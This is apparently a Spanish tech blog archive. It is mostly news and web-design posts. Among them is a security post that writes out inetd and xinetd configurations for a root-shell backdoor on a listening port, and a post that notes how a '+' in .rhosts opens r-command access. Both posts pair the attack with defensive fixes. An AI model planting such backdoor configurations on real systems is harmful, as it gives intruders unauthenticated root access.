Descripción:

Un método utilizado por los hackers para dejar una puerta trasera es una root shell. Se trata de dejar escuchando un puerto determinado poco conocido y hacer que al conectarnos a él nos devuelva una shell de root.
Imaginemos el caso más simple (en posteriores recetas comentaremos otros casos): el hacker tiene login en el sistema.
Vamos a hacerlo para aquellas configuraciones con inetd y con xinetd:

- inetd, se trata de añadir al fichero /etc/inetd.conf la siguiente línea:

ingreslock stream tcp nowait root /bin/bash -i

Hemos escogido el servicio ingreslock. /bin/bash -i nos devuelve una shell interactiva como root al conectarnos al puerto ingreslock.

- xinetd, se trata de crear un servicio bajo /etc/xinetd.d como por ejemplo:

service prueba
{
type = UNLISTED
id = prueba-stream
socket_type = stream
protocol = tcp
user = root
server = /bin/bash
server_args = -i
port = 60180
wait = no
disable = no
}

Es decir nos conectaríamos al puerto 60180 para obtener una sheel de root interactiva

De esta forma y considerando el segundo caso tan solo tendríamos que ejecutar:

para obtener la shell de root

¿ Da alguna idea a alguien que actualmente es administrador para el futuro?

Solución:

- Eliminar todos los servicios que no se utilizan.

- Hacer uso de herramientas de integridad de ficheros sobre los ficheros de configuración de servicios.

- Realizar testeo frecuente de puertos abiertos

Desde el magnífico blog de David Bravo nos llega esta noticia: la Federación de Consumidores en Acción (FACUA) ha comenzado una campaña contra la Ley de Propiedad Intelectual con el fin de eliminar el canon impuesto a CDs y DVDs, así como los sistemas anticopias, argumentando que éstos limitan los derechos de los usuarios.

Para ello están recogiendo firmas en su web, además de haber mandado una carta a los ministerios de Cultura, Sanidad y Consumo e Industria. Para más información podéis visitar la web de FACUA.

S3rGy0.

En España hemos dado otro paso, de la mano de algunos ministerios y la entidad pública Red.es, ha surgido la iniciativa “Familias conectadas”, la cual se encuentra integrada en el programa “Internet en el Aula”. Mediante ella, aquellas familias con hijos que lo deseen, podrán optar a uno de los 100.000 préstamos de mil euros para comprar un ordenador portátil con conexión de banda ancha a Internet. La financiación consistirá en el pago de la cantidad sin intereses durante los tres años siguientes a su compra.

Creo que es una buena iniciativa por parte del gobierno para intentar incrementar nuestra situación tecnológica frente a la comunidad europea.

Podemos ver más información en esta página.

El chileno Felipe Vera es el responsable de AIWeb. Esta interesante bitácora donde analiza con detalle la Arquitectura de la Información y la usabilidad web.

Pero…¿Qué es la Arquitectura de la Información? según el mismo Felipe es “la disciplina encargada de estructurar, organizar y etiquetar el contenido como también establecer los puntos de acceso, sistemas de busqueda y recuperación de información de cualquier aplicación soportada en la web, con el fin de que el usuario cumpla con los objetivos y su experiencia sea optima“.

Amigos, y es que la aplicación de la Ingeniería del Software en los desarrollos webs es de vital importancia para que el producto final alcance la calidad deseada. No podemos caer en la tentación de acometer la codificación de un proyecto web sin un estudio previo: análisis previo, análisis detallado, diseño… y cuando la solución esté completamente definida, entonces será el momento de comenzar codificar.

Es cierto, que los desarrollos web debemos hacerlos para ayer… es imperativo minimizar el tiempo de desarrollo para que los costes no se disparen y el precio del proyecto sea competitivo. Todos conocemos el altísimo grado de intrusismo que tiene esta profesión y eso hace mucho daño al sector, eso provoca situaciones como las que comenta nuestro amigo Loren en su artículo “¿Programador Web?“, en la que hace una comparación entre lo que cobra un fontanero y lo que cobra un desarrollador web. Aun así, la utilización de una metodología, con unas pautas bien definidas será la razón nuestro éxito y el elemento diferenciador con la competencia.

Cada día son más usuarios los que utilizan Mozilla como browser por defecto para navegar por la extensa maraña de la Red, pero aun son muchos más los que continuan utilizando el Microsoft Internet Explorer…¿Por qué será esto? Son muchas las ventajas las que ofrece Mozilla y sin embargo no termina de extenderse su uso como cabría esperar.

Lo mismo pasa con el sistema operativo gratuito Linux… cada día es más fácil de instalar y usar, pero los usuarios por el momento prefieren el Microsoft Windows XP, que es de pago 8O.

Las estadísticas de accesos a BdW son:

Hace ya bastante tiempo que llevo siguiendo esta interesante lista de correo, orientada sobretodo al mundo IT, también se publican noticias relacionadas al mundo GNU/Linux, lo cual capto mi atención de inmediato. Pero este artículo no tratará sobre el excelente contenido que presenta regularmente Carlos Tori (el hombre detrás de NNL Newsletter), este artículo tratará más bien una propuesta de rediseño en los boletines que se presentan.

Comenzamos

Si observamos los boletines que presenta NNL Newsletter podemos darnos cuenta que aún mantienen el formato usual de mensajes de correo electrónico, todo esto a pesar del avance que ha presentado la lista, ahora se puede catalogar como un sitio web en donde se podrá leer noticias interesantes, dichas noticias aparecen cada cierto tiempo, agrupadas en un mismo documento, al final de cada documento se anexa el soporte que le ha brindado Carlos Tori a sus fervientes lectores.

Desde mi perspectiva debe darse un “lavado de cara” al Newsletter. Comencemos por la semántica de los documentos. Tomaré como muestra el NNL Newsletter » 1.

Se trata de un término de moda que hace referencia a la manipulación maliciosa de las direcciones DNS de las que hace uso el usuario en su máquina con el fin de obtener datos privados del mismo, principalmente de banca on line. Este envenenamiento de direcciones puede producirse en el servidor DNS que utiliza el usuario o en el mismo fichero hosts del PC del usuario.

Las técnicas utilizadas para llevar a cabo este envenenamiento pueden ser muy variadas, destacando el uso de troyanos.

A nivel de usuario se recomienda:

- Utilizar un software antimalware que combine sistemas de detección proactivos y reactivos: la forma más sencilla de manipular un ordenador para que sea víctima del pharming es a través de un código malicioso, generalmente troyanos. Es muy recomendable utilizar sistemas de protección pro-activos, capaces de adelantarse a las amenazas y bloquearlas analizando simplemente su comportamiento.
- Instalar un firewall personal: con esta precaución se evita que un hacker pueda entrar en el ordenador a través de un puerto de comunicaciones desprotegido, y modificar el sistema.
- Actualizar regularmente el software instalado en el equipo o tener activados los sistemas de actualización automática, de forma que no existan vulnerabilidades que pueden ser aprovechadas para realizar este tipo de ataques.

Más info:

Panda

Desde Medellín (Colombia), Arte Dinámico nos ha elegido la web de la semana.

Arte Dinámico es una web dedicada al diseño en general, donde podemos encontrar las siguientes secciones: Noticias, eventos, tutoriales, libros, diccionarios, artículos, estudios, directorio, foros, tips y galería.

Gracias Edison por elegir nuestra web.

Ha salido un nuevo programa para descargar ficheros desde cuentas de correo de gran capacidad. La principal ventaja que tiene con respecto a peer2mail es que aprovecha mejor el ancho de banda. Además es más fácil de utilizar ya que, al igual que con bittorrent, sólo hay que descargarse un fichero .durie y en este fichero se encuentran (encriptados) el usuario y contraseña de la cuenta de correo.

Los anuncios de descargas desde este programa se encuentran disponibles en las webs dedicadas al p2m (en este blog tenéis disponible un post con unos cuantos enlaces) y en la misma web oficial del programa.

Actualmente sólo soporta los servidores Walla, Gawab y Xasamail. Imagino que Gmail no está incluido por los continuos bloqueos de cuentas que se producen. En cualquier caso es de esperar que progresivamente vayan ampliando el número de servidores ya que la actual versión es Beta.

Por último comentar que con algunas IPs da fallos de conexión, aunque este problema se puede solucionar fácilmente usando un proxy anónimo.

Creo que este programa apunta muy bien ya que aún estando en fase de desarrollo da resultados muy buenos. Esperemos que los desarrolladores se lo curren y sigan añadiendole más características a esta aplicación. Más información en progmaq.com

S3rGy0.

Descripción:

Los comandos rlogin, rcp y rsh son utilizados para login, copia y ejecución de comandos remota entre dos hosts. Facilitan las tareas de red al no solicitar password. Estos comandos consultan los ficheros /etc/hosts.allow, /etc/hosts.equiv y el fichero de usuario .rhosts para conceder permiso en la ejecución. El primer fichero hace referencia a hosts y servicios permitidos o denegados y el segundo a hosts y usuarios permitidos.
Las consecuencias en seguridad son evidentes. Imaginad un hacker que accede a un host y sabe que desde éste se pueden ejecutar comandos r en otros hosts que confian en el anterior. O un hacker que introduce la cadena + en el fichero .rhosts, haciendo de esta forma posible la ejecución de comandos r para cualquier host.
Un buen uso de la vulnerabilidad en seguridad que representan los comandos r la encontramos en el famoso ataque de Mitnick-Shimomura

Solución:

La solución más drástica pasa por no hacer uso de estos comandos. Para ello deshabilitaríamos su ejecución en inetd o xinetd.
Sin ser tan drásticos podemos:
- controlar con una herramienta de integridad de ficheros los archivos clave: /etc/hosts.allow, /etc/hosts.deny, /etc/hosts.equiv y .rhosts.
- Hacer uso de la gestión de atributos de ficheros para hacer a estos ficheros clave no modificables mediante chattr +i

Más info

tldp.org

CoreCSS is one of those web sites which everyone should store in favourites because of its usefulness, simplicity and, in my case, because of its necessity.

CoreCSS is a fantastic website where we can find a solution to any problem related to CSS web design. This generalised description might lead us to think that CoreCSS offers only CSS manuals, examples, tricks, etc. However, this would be underestimating what can be found. It’s true that CoreCSS offers a list of examples, but these are organized in such a way that they are of real use for learning purposes. They’re grouped in chapters and offer just what’s needed at any given moment, direct and to the point and without any superfluous code which makes it more difficult to resolve the problem at hand.

What’s more CoreCSS has a database of all CSS properties, so that only a couple of mouse clicks away, we can find out which property is needed, what that property really does, how it is used and what other uses are possible.

Another great idea which is provided is a master CSS compatibility chart, with respect to different web browsers, so that at any given moment we can check if the property we have just applied can be seen not only in IE 5.5 but also in IE 6 or in Netscape Navigator 4 in Mac. From the same table we can access a description of each property and a detailed description of each web browser and the properties supported.
Many more useful tools are at hand, a standard colour chart, a list of useful CSS links, news items about CSS, etc.

I can wholeheartedly recommend this site which is without doubt, a great discovery and a site I’m sure I’ll be revisiting in the future.

Translated from the original article in Spanish written by eMe.

A pesar de tener un nombre tan malo, bloginality es un sitio donde pasar unos minutos conociéndote a ti mismo.

Puedes comprobar tu personalidad (de ahí el nombre: bloginality=personality. ahm…claro ). De 8 opciones hay que seleccionar las 4 que más se ajusten a tu carácter y aunque parece raro creo que es bastante eficaz y acertó bastante en su descripción de mí mismo. Está en ingles pero sólo se tardan 30 segundos en responder, según tu nivel de inglés, claro.

Yesterday we published a post titled “Web Colour Palette” in which we noted the importance of the ideal selection of the colours for a website.

Many of you may already know the harmonic colour generator colormatch 5k and based on this tool is colormatch remix which allows us to generate the colour web palette in the format of photoshop and illustrator.

Translated from the original article in Spanish written by JGarcia.

¿Aburrido con tu teclado convencional?

FrogPad tiene sólo 20 teclas y mide unos 15 x 10 cm. Las letras más comunes en inglés han sido reposicionadas para que se pueda escribir con una sola mano. Hace poco la empresa desarrolladora ha sacado al mercado la versión Bluetooth denominada iFrog que se puede usar en conjunción con teléfonos móviles, PDAs, ordenadores personales, etc.

Según el fabricante después de 8 horas de práctica el usuario podrá escribir a una velocidad de 40 palabras por minuto. El teclado tiene usos obvios para gente incapacitada y como una herramienta más divertida para los niños pero también sirve para diseñadores, arquitectos y otros que a menudo manejan un ratón mientras escriben.

Aquí en España cuesta unos 130 euros. Si eres diestro por qué no pedir un iFrog zurdo y así uno puede teclear y manejar el ratón a la vez.

We all know the importance of web site colour choice. The choice of colour provides us with some prior information about the characteristics of the web site and the webmaster should dedicate some time to the selection of the colours used.

Follow this link to find a flash application which will help with colour selection.

Huey is one of those tools which every web designer needs at hand. An HTML colour code generator which can convert RGB values to hexadecimal and vice versa. You can use the colour selector to select colours from any part of the screen. Other options include a colour scheme, HTML insertion, favourite colours, safe palette and much more.

PagePainter is an original tool that allows you to create different colour schemes for your website and try each one until you decide on your preference.

Translated from the original article in Spanish written by JGarcia.

Buscando por internet información acerca de las nuevas fuentes de Microsoft encontré éste documento dónde explica cómo hacer para instalar las fuentes de Microsoft en Linux. Viene muy detallado y ofrece enlaces a todos los recursos que podrémos necesitar, como podrían ser las fuentes de Microsoft.

Ahora Linuxeros y Windowseros a esperar impacientes la salida del nuevo Internet Explorer 7 para utilizar las nuevas fuentes. Insólito.

Hoy nos hemos enterado de que Microsoft va a acompañar la salida al mercado de su Internet Explorer 7 de seis tipografías nuevas, cuyos nombres son Calibri, Cambria, Candara, Consolas, Constancia y Corbel, todas son magníficas, y como muestra, la imagen que ilustra éste artículo, un texto escrito con la tipografía Corbel.

No creo que el nuevo Internet Explorer me haga dejar de utilizar mi Firefox, pero ver que Microsoft a veces hace cosas tan buenas como éste set de tipografías alienta a uno a, cuando menos, seguir probando sus productos.

Podéis verlas todas en la página de Pointer on line.

La compañía del grito victorioso es la que últimamente está animando el mercado tecnológico en varios frentes. Por una parte, la semana pasada se anunció la compra del sevicio de compartición de fotografías Flickr por unos 30 millones de dólares, según la rumorología. Parece que las intenciones de Yahoo es integrar Flickr en su futuro sistema Yahoo 360º, el cual aún solo está disponible en versión beta y mediante invitación, y que ofrecerá a sus usuarios todos los servicios que pueda necesitar: blogs, buscadores, servicios de mensajería etc.

La otra gran noticia ha llegado hoy mismo con el anuncio de que Yahoo subirá la capacidad de sus cuentas de correo gratuítas de 250Mb a 1Gb, acción que comenzará a llevarse a cabo a finales del mes de Abril del presente año, y que podría haber sido provocada por el reciente anuncio de la salida al mercado en abierto de GMail el dia 1 de Abril

¿A quién le toca ahora mover ficha?

Para aquellos adictos a “la última versión” acaba de salir Firefox 1.0.2, última revisión del, para muchos, mejor navegador del momento, por las bondades que ya conocéis: Navegación en pestañas, filtro de pop-up’s, gran cantidad de extensiones para personalizarlo, etc.

Paralelamente se ha lanzado también el administrador de correo electrónico Thunderbird 1.0.2, asombrando ésta noticia, pues aún no había aparecido la versión 1.0.1 del producto, como sí ocurrió con Firebird. Parece que las versiones de ambos productos iran tomadas de la mano a partir de ahora y de ahí ese paralelismo.

La descarga de Firefox 1.0.2 está disponible en castellano, mientras que para disfrutar de Thunderbird 1.0.2 en la lengua de Cervantes tendremos que recurrir a los chicos del proyecto NAVE y sus fantásticas traducciones

Más información en la página de la fundación Mozilla.

La empresa inglesa Secure Signatures Systems nos presenta una solución idónea para aquellos que quieren obtener un alto nivel de seguridad en la autentificación de usuarios de un sistema.

Después de los dispositivos de identificación física, como pueden ser los lectores de huellas dactilares o retinas, este invento abre un nuevo campo en el sector de la seguridad. Se trata de un bolígrafo biométrico, el cual nos permite identificarnos de forma inequívoca frente a cualquier aplicación, ya sea para acceder a datos personales, archivos confidenciales o controlar cualquier acceso que requiera de una atención especial.

La forma de funcionamiento es la siguiente:

- Escribimos nuestra firma en cualquier lugar (papel, pizarra…) con este bolígrafo
- Unos sensores internos almacenan la forma en la que firmamos
- Conectamos el dispositivo a nuestro equipo por el puerto USB
- Se recupera la información y se compara con la que está almacenada
- Gracias al software específico, se nos permite o deniega el control de acceso

Nos consta que esta tecnología ya se está utilizando en el sector financiero, pero creo que en breve estoy seguro que se expandirá a otras áreas como puede ser el pago en comercios, control de acceso a edificios, gestiones en la administración pública…

¿Será el futuro de los dispositivos de autentificación?